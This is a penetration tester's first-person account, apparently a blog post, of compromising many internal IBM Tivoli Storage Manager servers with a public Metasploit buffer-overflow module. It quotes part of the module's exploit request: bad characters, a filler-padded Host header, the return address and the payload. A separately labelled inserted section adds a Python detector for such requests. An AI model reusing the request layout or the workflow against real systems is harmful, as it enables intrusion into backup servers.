Penetration testing - [Story of a successful PT on IBM Tivoli Server]

For the past few days I was on an internal VA/PT project in which I had a total of 140+ servers assigned. And the time was incredibly short, so a detailed analysis of these 140 servers wasn't possible in a week's time, so my plan was actually to do a quick intense Nmap scan on the targets and analyse the banners first, and then to give those targets to Nessus for any hot findings.

My targets were actually DR [Data Recovery] servers, so the scope of work was PT.

Nmap gave all the opened ports and service names perfectly, and what struck me was that almost all the servers were running IBM Tivoli Storage Manager.

This is actually an IBM product for protecting your servers' sensitive data and providing complete data recovery. How it works is that it is installed on every critical server whose backup is necessary; the Tivoli client moves all the data daily to a central server, and the central server encrypts the data and keeps it all safe. In case of a data recovery, all you have to do is get the backup from the Tivoli server and you are done.

I used to monitor my MSF updates, and my stupid brain alerted me about this product's exploit in MSF, so to verify I did a Google search and found that a coooooool exploit was there.
The exploit was released in April-May 2010, so chances are less that the admins would have patched it.
It was the IBM Tivoli Storage Manager Client HTTP server GET method buffer overflow. I migrated to my msf directory, opened the script directory and verified the exploit code.


Code:
ibm_tsm_cad_header.rb

      'Payload' =>
        {
          'Space'           => 650,
          'BadChars'        => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },

    sploit = "GET /BACLIENT HTTP/1.1\r\n"
    sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190)
    sploit << [target.ret].pack('V') + payload.encoded

    print_status("Trying target %s..." % target.name)

    sock.put(sploit + "\r\n\r\n")

And it's clear from the code that it uses a direct EIP overwrite and that the return address is from the target program's DLL only, so even if anything goes wrong there is nothing to worry about: it will only crash the vulnerable application.
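For the defending side, here is a small request checker I added as an example (it is not code from the post or from the Metasploit module): it parses a raw HTTP request and flags the shape the module sends, a GET for /BACLIENT whose Host header is far longer than any hostname or carries bytes a hostname cannot contain. The length threshold, the allowed host characters and the sample requests are assumptions constructed for this example.

```python
# Added example, not from the original post or the Metasploit module.
# The module's request is "GET /BACLIENT" with a Host header made of
# "127.0.0.1 " + 190 letters + 4 address bytes + encoded payload, all on one
# header line (CR/LF are in its BadChars). A real Host value is a short
# host[:port], so size and character set separate the two cleanly.
import re

# host[:port] characters only; IPv6 literals need the brackets. (assumed)
HOST_RE = re.compile(rb"^[A-Za-z0-9.\-:\[\]]{1,253}$")
MAX_HOST_LEN = 128  # assumed threshold; the exploit header is well over 190


def parse_request(raw: bytes):
    """Return (method, path, headers) from a raw request, keeping header
    values as bytes so filler and binary data survive inspection."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) < 2:
        return b"", b"", {}          # no usable request line
    headers = {}
    for line in lines[1:]:
        if b":" not in line:
            continue                  # malformed header line, skip it
        name, value = line.split(b":", 1)
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers


def is_tsm_cad_overflow_attempt(raw: bytes) -> bool:
    """True when a GET /BACLIENT request carries an oversized Host header
    or one containing bytes that cannot appear in a hostname."""
    method, path, headers = parse_request(raw)
    if method != b"GET" or path.upper() != b"/BACLIENT":
        return False
    host = headers.get(b"host")
    if not host:
        return False                  # missing Host is odd but not this bug
    if len(host) > MAX_HOST_LEN:
        return True
    return HOST_RE.match(host) is None


# Constructed samples: a normal client request and one shaped like the module's.
BENIGN = b"GET /BACLIENT HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"
SUSPECT = (b"GET /BACLIENT HTTP/1.1\r\nHost: 127.0.0.1 " + b"A" * 190
           + b"\x01\x02\x03\x04"      # stand-in for the 4 return-address bytes
           + b"X" * 32 + b"\r\n\r\n")  # stand-in for payload bytes

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, is_tsm_cad_overflow_attempt(req))
```

The same check can be run over a packet capture or proxy log of traffic to the client acceptor's HTTP port to find attempts after the fact.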

So I loaded my msf and fired the exploit on one of the targets, wooot woot ......

Awesome, now that half of the systems have Tivoli running, double wooooot, now it's 0wning time. I started owning the systems one by one, trying out different payloads one by one.


And the excitement was that there were so many servers and one cool reliable exploit for all, so pwning was so easy.

Just thought of sharing the exploit.

And among the targets 5 servers were AIX, and unfortunately MSF didn't have an exploit module for AIX servers for this exploit, so I wasn't able to verify it on those servers, but if the admins allow me to verify physically then I may try to build the same exploit for AIX and will share it.